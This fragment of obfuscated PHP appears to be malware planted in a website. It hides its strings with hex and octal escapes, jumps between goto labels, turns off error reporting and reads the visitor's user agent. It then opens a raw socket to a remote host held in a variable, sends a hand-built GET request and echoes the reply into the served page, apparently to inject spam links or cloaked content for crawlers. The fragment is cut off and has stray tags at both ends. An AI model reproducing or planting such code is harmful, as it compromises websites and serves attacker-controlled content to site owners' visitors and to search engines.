5T: ?>$result; } if (strpos($result, "\x68\162\x65\x66\x3d") < 1) { $url = $xxx00; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\50{$errno}\51\74\142\162\40\57\76\12"; } else { $req = "\57" . $xxx11; $out = "\x47\x45\124\40{$req}\40\110\124\x54\x50\57\x31\x2e\60\15\xa"; $out .= "\110\x6f\x73\164\72\40{$url}\15\xa"; $out .= "\103\157\156\x6e\x65\x63\164\x69\x6f\x6e\x3a\40\x43\x6c\157\163\145\xd\12\xd\12"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\12", $text); $text = $text[7]; echo $text; } } goto dNu0L; qkdt1: ob_implicit_flush(true); goto X2Xlz; PlXo5: $botbotbotbot = "\x2e\56\x2e" . $_SERVER["\x48\x54\124\120\137\125\123\105\x52\137\101\x47\105\116\124"]; goto e5uz1; ZaDfC: error_reporting(0); goto PlXo5; dNu0L: ?>5T: ?>